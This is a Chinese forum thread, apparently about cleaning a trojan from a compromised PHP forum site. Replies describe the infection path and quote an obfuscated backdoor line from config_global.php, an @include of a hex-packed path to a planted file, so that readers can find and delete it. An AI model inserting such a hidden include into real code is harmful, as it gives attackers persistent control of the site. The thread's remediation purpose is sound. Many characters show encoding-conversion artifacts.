木馬問(wèn)題不是在程序本身，而是服務(wù)器的權(quán)限， 是某種的木馬偽裝成圖片 通過(guò)上傳頭像 帖子等方式就上傳到你服務(wù)器上了，要命的是你服務(wù)器還允許執(zhí)行，
單純的清理木馬沒(méi)用的 要服務(wù)器的安全最主要
您可以加我QQ交談，有償服務(wù)，專(zhuān)業(yè)清理+安防

高二天 發(fā)表于 2019-10-17 11:52
一萬(wàn)個(gè)贊?。?！我跟樓主也一樣的
看到里面有@clude的這串代碼
請(qǐng)問(wèn)還有哪些目錄呢？一起處理 ...

建議官方文件恢復(fù)下 比較快

allthebest 發(fā)表于 2019-8-26 20:19
config下的config_global.php文件，找找惡意代碼,如：

@include(PACK('H*','443A2F777777726F6F742F78676 ...

一萬(wàn)個(gè)贊?。?！我跟樓主也一樣的
看到里面有@clude的這串代碼
請(qǐng)問(wèn)還有哪些目錄呢？一起處理

ghz0433 發(fā)表于 2019-8-27 00:10
謝謝，我重新更換了服務(wù)器，備份數(shù)據(jù)庫(kù)下載最新的程序恢復(fù)，還是不行現(xiàn)在服務(wù)器爬滿(mǎn)了蜘蛛，蜘蛛爬那些鏈 ...

這與config下的config_global.php文件有關(guān)，檢查權(quán)限設(shè)置

config下的config_global.php文件，找找惡意代碼,如：

@include(PACK('H*','443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870'));

近似的字符，直接刪除

更新緩存